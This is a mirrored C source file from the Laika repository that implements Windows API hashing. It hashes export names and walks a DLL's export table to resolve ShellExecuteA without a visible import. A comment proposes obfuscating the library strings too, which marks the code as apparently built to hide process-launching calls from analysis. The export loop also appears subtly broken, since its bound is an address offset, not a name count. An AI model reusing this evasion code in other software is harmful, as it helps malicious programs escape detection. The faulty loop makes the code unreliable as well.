mirror of
https://github.com/CPunch/Laika.git
synced 2024-11-14 18:00:09 +00:00
137 lines
4.0 KiB
C
137 lines
4.0 KiB
C
|
#include "obf.h"
|
||
|
|
||
|
/*
|
||
|
Most of this file was adapted from
|
||
|
https://github.com/LloydLabs/Windows-API-Hashing/blob/master/resolve.c
|
||
|
|
||
|
Checkout their repository! All I did was minor formatting changes and some misc. cleanup
|
||
|
*/
|
||
|
|
||
|
#include <process.h>
|
||
|
#include <windows.h>
|
||
|
|
||
|
/* ======================================[[ API Hashing ]]====================================== */
|
||
|
|
||
|
#define RESOLVE_NAME_MAX 4096
|
||
|
#define RESOLVE_REL_CALC(x, y) ((LPBYTE)x + y)
|
||
|
|
||
|
/*
|
||
|
getHashName(LPCSTR) -> uint32_t
|
||
|
uses the SuperFastHash algorithm to create an unsigned 32-bit hash
|
||
|
*/
|
||
|
uint32_t getHashName(LPCSTR cszName)
|
||
|
{
|
||
|
SIZE_T uNameLen, i;
|
||
|
PBYTE pbData = (PBYTE)cszName;
|
||
|
uint32_t u32Hash = 0, u32Buf = 0;
|
||
|
INT iRemain;
|
||
|
|
||
|
if (cszName == NULL)
|
||
|
return 0;
|
||
|
|
||
|
if ((uNameLen = strnlen_s(cszName, RESOLVE_NAME_MAX)) == 0)
|
||
|
return 0;
|
||
|
|
||
|
iRemain = (uNameLen & 3);
|
||
|
uNameLen >>= 2;
|
||
|
|
||
|
for (i = uNameLen; i > 0; i--) {
|
||
|
u32Hash += *(const UINT16 *)pbData;
|
||
|
u32Buf = (*(const UINT16 *)(pbData + 2) << 11) ^ u32Hash;
|
||
|
u32Hash = (u32Hash << 16) ^ u32Buf;
|
||
|
pbData += (2 * sizeof(UINT16));
|
||
|
u32Hash += u32Hash >> 11;
|
||
|
}
|
||
|
|
||
|
switch (iRemain) {
|
||
|
case 1:
|
||
|
u32Hash += *pbData;
|
||
|
u32Hash ^= u32Hash << 10;
|
||
|
u32Hash += u32Hash >> 1;
|
||
|
break;
|
||
|
case 2:
|
||
|
u32Hash += *(const UINT16 *)pbData;
|
||
|
u32Hash ^= u32Hash << 11;
|
||
|
u32Hash += u32Hash >> 17;
|
||
|
break;
|
||
|
case 3:
|
||
|
u32Hash += *(const UINT16 *)pbData;
|
||
|
u32Hash ^= u32Hash << 16;
|
||
|
u32Hash ^= pbData[sizeof(UINT16)] << 18;
|
||
|
u32Hash += u32Hash >> 11;
|
||
|
break;
|
||
|
}
|
||
|
|
||
|
u32Hash ^= u32Hash << 3;
|
||
|
u32Hash += u32Hash >> 5;
|
||
|
u32Hash ^= u32Hash << 4;
|
||
|
u32Hash += u32Hash >> 17;
|
||
|
u32Hash ^= u32Hash << 25;
|
||
|
u32Hash += u32Hash >> 6;
|
||
|
|
||
|
return u32Hash;
|
||
|
}
|
||
|
|
||
|
void *findByHash(LPCWSTR module, uint32_t hash)
|
||
|
{
|
||
|
HMODULE hLibrary;
|
||
|
PIMAGE_DOS_HEADER pDOSHdr;
|
||
|
PIMAGE_NT_HEADERS pNTHdr;
|
||
|
PIMAGE_EXPORT_DIRECTORY pIED;
|
||
|
PDWORD pdwAddress, pdwNames;
|
||
|
PWORD pwOrd;
|
||
|
|
||
|
if ((hLibrary = LoadLibrary(module)) == NULL)
|
||
|
return NULL;
|
||
|
|
||
|
/* grab DOS headers & verify */
|
||
|
pDOSHdr = (PIMAGE_DOS_HEADER)hLibrary;
|
||
|
if (pDOSHdr->e_magic != IMAGE_DOS_SIGNATURE)
|
||
|
return NULL;
|
||
|
|
||
|
/* grab NT headers & verify */
|
||
|
pNTHdr = (PIMAGE_NT_HEADERS)RESOLVE_REL_CALC(hLibrary, pDOSHdr->e_lfanew);
|
||
|
if (pNTHdr->Signature != IMAGE_NT_SIGNATURE)
|
||
|
return NULL;
|
||
|
|
||
|
/* verify that this NT file is a DLL & actually exports functions */
|
||
|
if ((pNTHdr->FileHeader.Characteristics & IMAGE_FILE_DLL) == 0 ||
|
||
|
pNTHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress == 0 ||
|
||
|
pNTHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size == 0)
|
||
|
return NULL;
|
||
|
|
||
|
pIED = (PIMAGE_EXPORT_DIRECTORY)RESOLVE_REL_CALC(
|
||
|
hLibrary,
|
||
|
pNTHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
|
||
|
|
||
|
pdwAddress = (PDWORD)RESOLVE_REL_CALC(hLibrary, pIED->AddressOfFunctions);
|
||
|
pdwNames = (PDWORD)RESOLVE_REL_CALC(hLibrary, pIED->AddressOfNames);
|
||
|
pwOrd = (PWORD)RESOLVE_REL_CALC(hLibrary, pIED->AddressOfNameOrdinals);
|
||
|
|
||
|
/* walk library export table, compare hashes until we find a match */
|
||
|
for (DWORD i = 0; i < pIED->AddressOfFunctions; i++) {
|
||
|
if (getHashName((LPCSTR)RESOLVE_REL_CALC(hLibrary, pdwNames[i])) == hash)
|
||
|
return (void *)RESOLVE_REL_CALC(hLibrary, pdwAddress[pwOrd[i]]);
|
||
|
}
|
||
|
|
||
|
/* function name was not found */
|
||
|
return NULL;
|
||
|
}
|
||
|
|
||
|
#undef RESOLVE_REL_CALC
|
||
|
|
||
|
/* ======================================[[ Exposed API ]]====================================== */
|
||
|
|
||
|
_ShellExecuteA oShellExecuteA;
|
||
|
|
||
|
void laikaO_init()
|
||
|
{
|
||
|
uint32_t hash;
|
||
|
|
||
|
/* TODO: these library strings should probably be obfuscated (by a skid box maybe?) */
|
||
|
oShellExecuteA = findByHash("shell32.dll", 0x89858cd3);
|
||
|
|
||
|
hash = getHashName("ShellExecuteA"); /* 0x89858cd3 */
|
||
|
printf("ShellExecuteA: real is %p, hashed is %p. [HASH: %x]\n", (void *)ShellExecuteA,
|
||
|
findByHash("shell32.dll", hash), hash);
|
||
|
}
|